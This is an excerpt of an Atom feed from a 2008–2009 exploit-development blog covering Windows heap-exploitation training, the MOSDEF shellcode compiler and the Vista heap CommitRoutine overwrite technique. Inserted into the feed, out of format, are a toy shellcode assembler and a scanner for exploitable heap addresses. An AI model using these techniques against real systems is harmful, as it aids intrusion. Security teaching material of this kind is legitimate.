term='windows 2003'/><category scheme='http://www.blogger.com/atom/ns#' term='japan'/><category scheme='http://www.blogger.com/atom/ns#' term='heap overflow'/><title type='text'>If you are doing your homework correctly, you will get... (II)</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_aUReV5sSeqk/SZIEKbv6SjI/AAAAAAAAEuw/upoy1Taf8Oc/s1600-h/screenshot_3rd_day.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 187px;" src="http://4.bp.blogspot.com/_aUReV5sSeqk/SZIEKbv6SjI/AAAAAAAAEuw/upoy1Taf8Oc/s320/screenshot_3rd_day.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5301304288662407730" /&gt;&lt;/a&gt;&lt;br /&gt;Dear Diary,&lt;br /&gt;  The &lt;a href="http://www.cyberdefense.jp/service_seminar/seminar07.html"&gt;Tokyo training&lt;/a&gt; is next week, and I just finished writing the last exercise for day 3. If you did it correctly, your Visualsploit would look like the figure above. &lt;br /&gt;  The exercise is for Windows 2003, and the objective is to exploit the heap by overwriting a Lookaside list pointer. The options were: I write my own server, or the students have to install Citrix 4.5 to own Brett Moore's bug ;)&lt;br /&gt;  After the lookaside trick, the exercise moves on to a heap-to-stack trick, and finishes with a ret2libc to disable DEP.&lt;br /&gt;  Learning how to exploit the heap correctly is like learning programming: once you learn how to code in C, you can do it in everything else.&lt;br /&gt;  The C of heap learning is Windows 2000 exploitation. Once you master the way to control the heap, predict how it's going to look and diagnose a crash without looking at code, you are ready for everything else (and that pretty much includes other OS heaps). 
&lt;br /&gt;  That's the real extra value of this class, and that is why the first day of class is so hard.&lt;br /&gt;&lt;br /&gt;  In other news, someone wrote a paper on format string exploitation using Immunity Debugger: &lt;a href="http://milw0rm.com/papers/282"&gt;http://milw0rm.com/papers/282&lt;/a&gt;. &lt;br /&gt;&lt;br /&gt;Cheers,&lt;br /&gt;Nico&lt;br /&gt;PS: Tomorrow I have tickets for Peter Murphy for the first time in Buenos Aires. I'm so getting a Bauhaus t-shirt.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-3801988476811558383?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/3801988476811558383/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=3801988476811558383' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/3801988476811558383'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/3801988476811558383'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2009/02/if-you-are-doing-your-homework.html' title='If you are doing your homework correctly, you will get... 
(II)'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_aUReV5sSeqk/SZIEKbv6SjI/AAAAAAAAEuw/upoy1Taf8Oc/s72-c/screenshot_3rd_day.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-6737708958753080406</id><published>2009-02-05T06:42:00.000-08:00</published><updated>2009-02-05T07:46:55.496-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='mosdef'/><category scheme='http://www.blogger.com/atom/ns#' term='python'/><category scheme='http://www.blogger.com/atom/ns#' term='compiler'/><category scheme='http://www.blogger.com/atom/ns#' term='shellcode'/><category scheme='http://www.blogger.com/atom/ns#' term='assembly'/><title type='text'>MOSDEF 2.0 is out!</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_aUReV5sSeqk/SYr7EW8yrKI/AAAAAAAAEuQ/EmBdcq4Cjoc/s1600-h/2498888608_17d590ffd7_o.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 213px;" src="http://4.bp.blogspot.com/_aUReV5sSeqk/SYr7EW8yrKI/AAAAAAAAEuQ/EmBdcq4Cjoc/s320/2498888608_17d590ffd7_o.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5299323963853417634" /&gt;&lt;/a&gt;&lt;br /&gt;Dear Diary,&lt;br /&gt;  MOSDEF 2.0 is out, let the hype begin... &lt;br /&gt;  Wait...&lt;br /&gt;  Where is all the cheering? 
&lt;br /&gt;  Do we need to coordinate with a lot of vendors to make it cool?&lt;br /&gt;  Ah, or maybe announce it secretly, teasing everyone with something it doesn't do?&lt;br /&gt;&lt;br /&gt;  The interweb has changed quite a lot lately...&lt;br /&gt;  &lt;br /&gt;  Anyway, MOSDEF v2.0, an LGPL C-like compiler written in Python, is out. And it's incredibly fast.&lt;br /&gt;  Why would you use it? Because it's fun, because it's simple to use, and because it's practical.&lt;br /&gt;  Beyond the usual compiler capabilities, you can use MOSDEF inside your exploit for shellcode. Rather than the usual stolen string of shellcode, you can now write your own by doing:&lt;br /&gt;&lt;blockquote&gt;from MOSDEF import mosdef&lt;br /&gt;mosdef.assemble("jmp %ebx", "X86") # or "PPC"&lt;/blockquote&gt;&lt;br /&gt;   Simple and useful. But this is about the simplest thing you can do with it; there is a huge world of things you can now do.&lt;br /&gt;   I would love to see people start building their own packers/polymorphic shellcode on top of MOSDEF.&lt;br /&gt;   &lt;br /&gt;   The compiler chain works this way (stolen from Rich's PDF):&lt;br /&gt;   cc.py -&gt; cpp.py -&gt; cparse2.py -&gt; il2X86.py -&gt; x86parse.py -&gt; makeexe.py&lt;br /&gt;&lt;br /&gt;   If you want to see the mechanics of the compiler, you probably want to take a look at the first three files, but what we really care about for any cool new tool is the last three:&lt;br /&gt;&lt;br /&gt;   &lt;span style="font-weight:bold;"&gt;il2X86.py &lt;/span&gt;takes a really simple-to-understand Intermediate Language and transforms it into assembly. 
Let's see some examples:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;    &lt;br /&gt;    def _loadint(self, words):&lt;br /&gt;        return ["movl $%d,%%eax\n" % long(words[1],0)]&lt;br /&gt;&lt;br /&gt;    def _call(self, words):&lt;br /&gt;        return ["call %s\n"%words[1]]&lt;br /&gt;&lt;br /&gt;    def _subconst(self, words):&lt;br /&gt;        return ["subl $%d,%%eax\n"%int(words[1])]&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;    &lt;br /&gt;    With an IL this simple, it would be really easy to turn the IL into a virtual-machine packer instead of x86. &lt;br /&gt;&lt;br /&gt;    &lt;span style="font-weight:bold;"&gt;x86parse.py&lt;/span&gt; is the file in charge of transforming the output assembly into opcodes.&lt;br /&gt;    &lt;span style="font-weight:bold;"&gt;makeexe.py&lt;/span&gt; is in charge of creating, from the generated shellcode, a binary in the corresponding file format. If you are talking Windows (which is not released in 2.0, CANVAS clients only for now), you can probably create one of the smallest PEs a compiler can give you (and forget about the IAT or any imports). At this step you can also easily create your own ELF, including whatever tweaks you might want to add.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;   Hopefully soon I will write a bigger post with many more details. For a good read, get &lt;a href="http://www.immunityinc.com/downloads/MOSDEF2.0.pdf"&gt;Rich's paper&lt;/a&gt;, or directly download the &lt;a href="http://www.immunityinc.com/downloads/MOSDEF2dot0.tar.gz"&gt;MOSDEF 2.0 sources&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Cheers,&lt;br /&gt;Nico&lt;br /&gt;PS: Since we released MOSDEF 2.0, we are preparing a one- or two-day training on Windows 32 shellcode writing. 
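As an added example (not MOSDEF's own code), here is a miniature of the il2X86.py and x86parse.py stages described above, in Python like MOSDEF itself. il_to_x86() mirrors the one-handler-per-IL-word structure of the snippet above, and assemble_x86() turns the AT&amp;T text those handlers emit into bytes, labels included. Only loadint, call and subconst come from the post; the other IL words (addconst, pushaccum, popaccum, jmpreg, ret, label) are assumptions made for this example, and the opcode tables cover just the handful of 32-bit x86 instructions the handlers can produce.

```python
import re

# Stage 1: IL text to AT&T x86 assembly, one handler per IL word (as in il2X86.py).
# IL words other than loadint/call/subconst are this example's own invention.
def il_to_x86(il_text):
    """Translate a tiny accumulator-style IL (one instruction per line)
    into a list of AT&T-syntax x86 assembly lines."""
    handlers = {
        "loadint":   lambda w: "movl $%d,%%eax" % int(w[1], 0),
        "addconst":  lambda w: "addl $%d,%%eax" % int(w[1], 0),
        "subconst":  lambda w: "subl $%d,%%eax" % int(w[1], 0),
        "pushaccum": lambda w: "pushl %eax",
        "popaccum":  lambda w: "popl %eax",
        "call":      lambda w: "call %s" % w[1],
        "jmpreg":    lambda w: "jmp %%%s" % w[1],
        "ret":       lambda w: "ret",
        "label":     lambda w: "%s:" % w[1],
    }
    asm = []
    for line in il_text.strip().splitlines():
        words = line.split()
        if words:
            asm.append(handlers[words[0]](words))
    return asm


# Stage 2: assembly text to opcodes for exactly the subset stage 1 emits
# (the role x86parse.py plays in the real chain).
_IMM32_EAX = {"movl": b"\xb8", "addl": b"\x05", "subl": b"\x2d"}   # op eax, imm32
_FIXED = {"pushl %eax": b"\x50", "popl %eax": b"\x58",
          "ret": b"\xc3", "jmp %ebx": b"\xff\xe3"}                  # FF /4 with ebx
_REL32 = {"call": b"\xe8", "jmp": b"\xe9"}                          # rel32 forms


def _imm32(value):
    return value.to_bytes(4, "little", signed=True)


def _encode(line, offset, labels):
    """Encode one line placed at `offset`. On the sizing pass labels is None
    and relative targets are emitted as zero; the length is what matters."""
    line = line.strip()
    if line.endswith(":"):
        return b""
    m = re.match(r"(movl|addl|subl) \$(-?\d+),%eax$", line)
    if m:
        return _IMM32_EAX[m.group(1)] + _imm32(int(m.group(2)))
    if line in _FIXED:
        return _FIXED[line]
    m = re.match(r"(call|jmp) (\w+)$", line)
    if m:
        if labels is None:
            return _REL32[m.group(1)] + _imm32(0)
        target = labels[m.group(2)]                  # KeyError on an unknown label
        return _REL32[m.group(1)] + _imm32(target - (offset + 5))
    raise ValueError("unsupported instruction: %r" % line)


def assemble_x86(lines):
    """Two-pass assembler: pass 1 records label offsets, pass 2 emits bytes."""
    labels, offset = {}, 0
    for line in lines:
        s = line.strip()
        if s.endswith(":"):
            labels[s[:-1]] = offset
        else:
            offset += len(_encode(s, offset, None))
    code, offset = b"", 0
    for line in lines:
        chunk = _encode(line, offset, labels)
        code += chunk
        offset += len(chunk)
    return code


def compile_il(il_text):
    """IL text in, raw shellcode bytes out (the il2X86 and x86parse steps)."""
    return assemble_x86(il_to_x86(il_text))


if __name__ == "__main__":
    sample = "loadint 0x41\nsubconst 1\ncall helper\nret\nlabel helper\nloadint 5\nret"
    print(il_to_x86(sample))
    print(compile_il(sample).hex())
```

Retargeting the handlers to emit bytecode for a small interpreter instead of x86 text is the "virtual-machine packer" idea mentioned above: the IL stays the same, only the handler table changes.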
If you are interested, ping me.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-6737708958753080406?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/6737708958753080406/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=6737708958753080406' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6737708958753080406'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6737708958753080406'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2009/02/mosdef-20-is-out-get-your-copy-at-your.html' title='MOSDEF 2.0 is out!'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_aUReV5sSeqk/SYr7EW8yrKI/AAAAAAAAEuQ/EmBdcq4Cjoc/s72-c/2498888608_17d590ffd7_o.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-6941272869074979604</id><published>2009-01-30T09:58:00.000-08:00</published><updated>2009-01-30T10:19:04.732-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='visualsploit'/><title type='text'>Hacking mainstream</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" 
href="http://1.bp.blogspot.com/_aUReV5sSeqk/SYNEaafCh0I/AAAAAAAAEuI/T-NK4QtZ2pw/s1600-h/VisualSploit.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 295px;" src="http://1.bp.blogspot.com/_aUReV5sSeqk/SYNEaafCh0I/AAAAAAAAEuI/T-NK4QtZ2pw/s320/VisualSploit.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5297152807294633794" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Dear diary,&lt;br /&gt;   Back in the day, when I was still doing Linux exploits and thought that real men infoleak/bruteforce their way to shellcode, that client-side was for pony-tailed nymphets and denial of service on hoolios was for lonely guys who drink fruit daiquiris, Dave came to me with a new project that he wanted me to manage: Visualsploit.&lt;br /&gt;   At first I thought "I'd rather write advisories for antivirus vulnerabilities" than work on a visual language for exploits; who in the world would ever use that? &lt;br /&gt;   And as it happens with smart people's vision, time always gives you the answer. We hired Damian Gomez full time to work on the project; I helped a little bit with the core, but most of it was just Dami: all the nice icons and the cool features.&lt;br /&gt;   Visualsploit was never focused on selling, as I thought, but rather on being a Swiss army knife for trainings. The visual language gives the -great- advantage of avoiding dealing with programming at all in a class. Obviously we encourage people to modify the scripts and learn the Python, but for classes such as Basic Stack Overflow or even Heap Overflow, what's the need to force someone to learn Python? In the end, it's as we always said... Exploiting is nothing more than smart debugging.&lt;br /&gt;   Today I spent an hour adding two modules that communicate with my exercise server, one for allocating memory and the other one for overwriting information. 
Because, if you have 4 days to explain how to exploit Windows 2000, XP/2003 and Vista, you certainly don't want to make your students spend time debugging the protocol.&lt;br /&gt;&lt;br /&gt;Cheers,&lt;br /&gt;Nico &lt;br /&gt;PS: Yes, the icons for Allocate/Overwrite were also made by Dami!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-6941272869074979604?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/6941272869074979604/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=6941272869074979604' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6941272869074979604'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6941272869074979604'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2009/01/hacking-mainstream.html' title='Hacking mainstream'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_aUReV5sSeqk/SYNEaafCh0I/AAAAAAAAEuI/T-NK4QtZ2pw/s72-c/VisualSploit.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-2398830691810648577</id><published>2009-01-19T11:17:00.000-08:00</published><updated>2009-01-19T11:23:29.458-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='blockindex'/><category 
scheme='http://www.blogger.com/atom/ns#' term='bypassing'/><category scheme='http://www.blogger.com/atom/ns#' term='pheap'/><category scheme='http://www.blogger.com/atom/ns#' term='vista heap'/><category scheme='http://www.blogger.com/atom/ns#' term='ben hawkes'/><category scheme='http://www.blogger.com/atom/ns#' term='ucrentry'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Hacking Vista Heap: The Ben Hawkes technique part II</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_aUReV5sSeqk/SXTSXRvgFrI/AAAAAAAAEt4/LEb5d5uC01g/s1600-h/bee_on_polen.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 213px;" src="http://4.bp.blogspot.com/_aUReV5sSeqk/SXTSXRvgFrI/AAAAAAAAEt4/LEb5d5uC01g/s320/bee_on_polen.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5293086759408637618" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;"Even though I walk through the valley of the shadow of death, I will fear no evil..."&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;On the blog entry "&lt;a href="http://eticanicomana.blogspot.com/2008/12/if-you-are-doing-your-homework.html"&gt;If you are doing your homework correctly...&lt;/a&gt;" I showed a little bit of how you can modify the LSB of a heap chunk pointer so that, after freeing it, you get the heap's own address back from an RtlAllocateHeap call. 
This is part of Ben Hawkes' presentation at RUXCON.&lt;br /&gt;&lt;br /&gt;The second step was to construct the overwriting buffer for the global heap structure that will let you trigger the CommitRoutine (a function pointer stored in the heap structure that gets called when the heap needs to be extended).&lt;br /&gt;To build it, you need two hardcoded addresses (or heap-spray based, or based on other lovely tricks such as the Sotirov/Dowd .NET DLL load), for the "BlockIndex" and the "UCREntry"; otherwise you will suffer all kinds of read/write crashes in ntdll.dll.&lt;br /&gt;&lt;br /&gt;Now, I might be wrong with this statement, but on the code flow I followed, the first hardcoded address needs to fulfil many more requirements than the ones announced by the good old Ben.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;BlockIndex&lt;/span&gt;&lt;br /&gt;  There are a couple of ways to allocate on the Vista heap, depending on the heap usage (e.g. the activation of the Low Fragmentation Heap for a given size), the arguments passed, etc. 
In our case, to extend the heap we are going to allocate without using a bucket, which is the common behaviour.&lt;br /&gt;  The BlockIndex is a structure whose pointer is saved at [PHEAP+0xB8], and it is the first hardcoded address we need to craft.&lt;br /&gt;&lt;br /&gt;  This structure has a singly-linked list connecting other BlockIndex structures, so our address should have its first DWORD as 0x0:&lt;br /&gt;&lt;blockquote&gt;  *( Blocks + 0) ==  0x0&lt;/blockquote&gt;  &lt;br /&gt;  The next dangerous point in the code is when the block uses the FreeListPointer to get a doubly-linked list of chunks out of it:&lt;br /&gt; &lt;blockquote&gt; *( Blocks + 0x18 ) == FLP    (FLP needs to be an existing, readable address)&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;  FLP, as I said before, is a doubly-linked list, so the algorithm will take the backward link to grab the first chunk out of it:&lt;br /&gt;&lt;br /&gt;  &lt;blockquote&gt;*(FLP + 4) == CHUNK   (CHUNK needs to be readable)&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;  And later, it will take CHUNK, read the first DWORD of its header and compare it against PHEAP-&gt;EncodeFlagMask:&lt;br /&gt;  &lt;blockquote&gt;*(CHUNK - 8 ) == CONSTANT (if it's zero, better).&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;  And that's it! (he he).&lt;br /&gt;  Yes, it doesn't pass the strawberry pudding rule, but as hard as it looks, it's not -that- hard to find addresses that fulfil all those requirements. The requirements for the second hardcoded address (UCREntry) are well explained in Ben Hawkes' presentation.&lt;br /&gt;  I wrote a simple but useful script that tries to find addresses that meet all those requirements, and believe it or not, there are a lot of them. 
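The address check described above, as an added example in Python (this is not the author's script, which he says he will release after class): a checker for the four BlockIndex requirements, driven by two callbacks so it runs offline over a constructed memory image. Inside Immunity Debugger you would back read_long with imm.readLong, which the post mentions, and readable with whatever page-lookup you prefer (an assumption of this example, not something the post specifies). The offsets follow the post; the rejection messages, the candidate ranking and the fake memory image are this example's own.

```python
# Offsets from the post: +0 next-BlockIndex link, +0x18 FreeListPointer,
# FLP+4 backward link, CHUNK-8 header dword compared with EncodeFlagMask.
BLOCKS_NEXT = 0x0
BLOCKS_FLP = 0x18
FLP_BLINK = 0x4
CHUNK_HEADER = 0x8


def check_blockindex(read_long, readable, blocks):
    """Return (ok, detail). ok is True when `blocks` satisfies every
    requirement; detail is then the header dword found at CHUNK-8
    (zero is the preferred value), otherwise the reason for rejection."""
    if not (readable(blocks + BLOCKS_NEXT) and readable(blocks + BLOCKS_FLP)):
        return False, "BlockIndex itself not readable"
    if read_long(blocks + BLOCKS_NEXT) != 0:
        return False, "next-BlockIndex pointer is not NULL"
    flp = read_long(blocks + BLOCKS_FLP)
    if not readable(flp + FLP_BLINK):
        return False, "FreeListPointer 0x%08x not readable" % flp
    chunk = read_long(flp + FLP_BLINK)
    if not readable(chunk - CHUNK_HEADER):
        return False, "chunk 0x%08x header not readable" % chunk
    return True, read_long(chunk - CHUNK_HEADER)


def find_blockindex_candidates(read_long, readable, start, end, step=4):
    """Scan [start, end) and return (address, header dword) pairs, with the
    addresses whose CHUNK-8 dword is zero first, then ordered by address."""
    found = []
    for addr in range(start, end, step):
        ok, detail = check_blockindex(read_long, readable, addr)
        if ok:
            found.append((addr, detail))
    found.sort(key=lambda item: (item[1] != 0, item[0]))
    return found


# Constructed memory image (not a real dump): dword address to value. An
# address counts as readable only if it is present in the dict, which is a
# deliberate simplification of page-level readability.
FAKE_MEM = {
    # candidate A: every pointer resolves and the header dword is zero
    0x00300000: 0x0, 0x00300018: 0x00301000,
    0x00301004: 0x00302008, 0x00302000: 0x0,
    # candidate B: valid, but the header dword is non-zero
    0x00300100: 0x0, 0x00300118: 0x00301100,
    0x00301104: 0x00302108, 0x00302100: 0x41414141,
    # rejected: first dword is not NULL
    0x00300200: 0x1, 0x00300218: 0x00301000,
    # rejected: FreeListPointer points into unmapped memory
    0x00300300: 0x0, 0x00300318: 0x00ABC000,
}


def demo():
    """Run the scan over the constructed image using dict lookups as the
    two callbacks; with a debugger you would pass its read/readable APIs."""
    return find_blockindex_candidates(FAKE_MEM.__getitem__, FAKE_MEM.__contains__,
                                      0x00300000, 0x00300400)


if __name__ == "__main__":
    for addr, header in demo():
        print("0x%08x  header dword 0x%08x" % (addr, header))
```

The ranking puts zero-header candidates first because, as noted above, a zero value is the safest thing to have compared against EncodeFlagMask; whether any of the survivors sits at an address that ASLR leaves alone is the open question the post ends on.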
&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_aUReV5sSeqk/SXTShH60dAI/AAAAAAAAEuA/t1abqpk7qVI/s1600-h/benhawkes_screenshow.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 174px;" src="http://3.bp.blogspot.com/_aUReV5sSeqk/SXTShH60dAI/AAAAAAAAEuA/t1abqpk7qVI/s320/benhawkes_screenshow.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5293086928570446850" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;  The question now is: &lt;span style="font-weight:bold;"&gt;Can we really find one not affected by ASLR?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Peace,&lt;br /&gt;Nico&lt;br /&gt;  &lt;br /&gt;PS: I don't want to spoil the scoop for the Japanese students in the Heap class, so I will release the script after class ;). (Anyway, you can do it yourself; it's just a couple of readLong calls.)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-2398830691810648577?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/2398830691810648577/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=2398830691810648577' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/2398830691810648577'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/2398830691810648577'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2009/01/hacking-vista-heap-ben-hawkes-technique.html' title='Hacking Vista Heap: The Ben Hawkes technique part II'/><author><name>Nico 
Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_aUReV5sSeqk/SXTSXRvgFrI/AAAAAAAAEt4/LEb5d5uC01g/s72-c/bee_on_polen.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-8833427376001429713</id><published>2008-12-31T08:03:00.000-08:00</published><updated>2008-12-31T08:14:13.619-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bugs'/><category scheme='http://www.blogger.com/atom/ns#' term='the great bas alberts'/><category scheme='http://www.blogger.com/atom/ns#' term='exploits'/><title type='text'>God bless the interweb</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_aUReV5sSeqk/SVuYxw0CeQI/AAAAAAAAEr4/Byo5TYJWImg/s1600-h/deadbug3.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 214px;" src="http://3.bp.blogspot.com/_aUReV5sSeqk/SVuYxw0CeQI/AAAAAAAAEr4/Byo5TYJWImg/s320/deadbug3.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5285986568333588738" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;If you thought that the hype was all over... after the DNS and the CA affaire.&lt;br /&gt;If you thought that the fun was all over... 
after Microsoft patched MS08-067.&lt;br /&gt;&lt;br /&gt;You were wrong.&lt;br /&gt;&lt;br /&gt;The "Great" Bas Alberts is back to blogging: &lt;a href="http://basonbugs.blogspot.com/"&gt;Bas on Bugs&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Happy new year.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-8833427376001429713?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/8833427376001429713/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=8833427376001429713' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/8833427376001429713'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/8833427376001429713'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/12/god-bless-interweb.html' title='God bless the interweb'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_aUReV5sSeqk/SVuYxw0CeQI/AAAAAAAAEr4/Byo5TYJWImg/s72-c/deadbug3.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-5712726095800414730</id><published>2008-12-22T13:46:00.000-08:00</published><updated>2008-12-22T13:52:58.757-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='md_update'/><category scheme='http://www.blogger.com/atom/ns#' term='luciano 
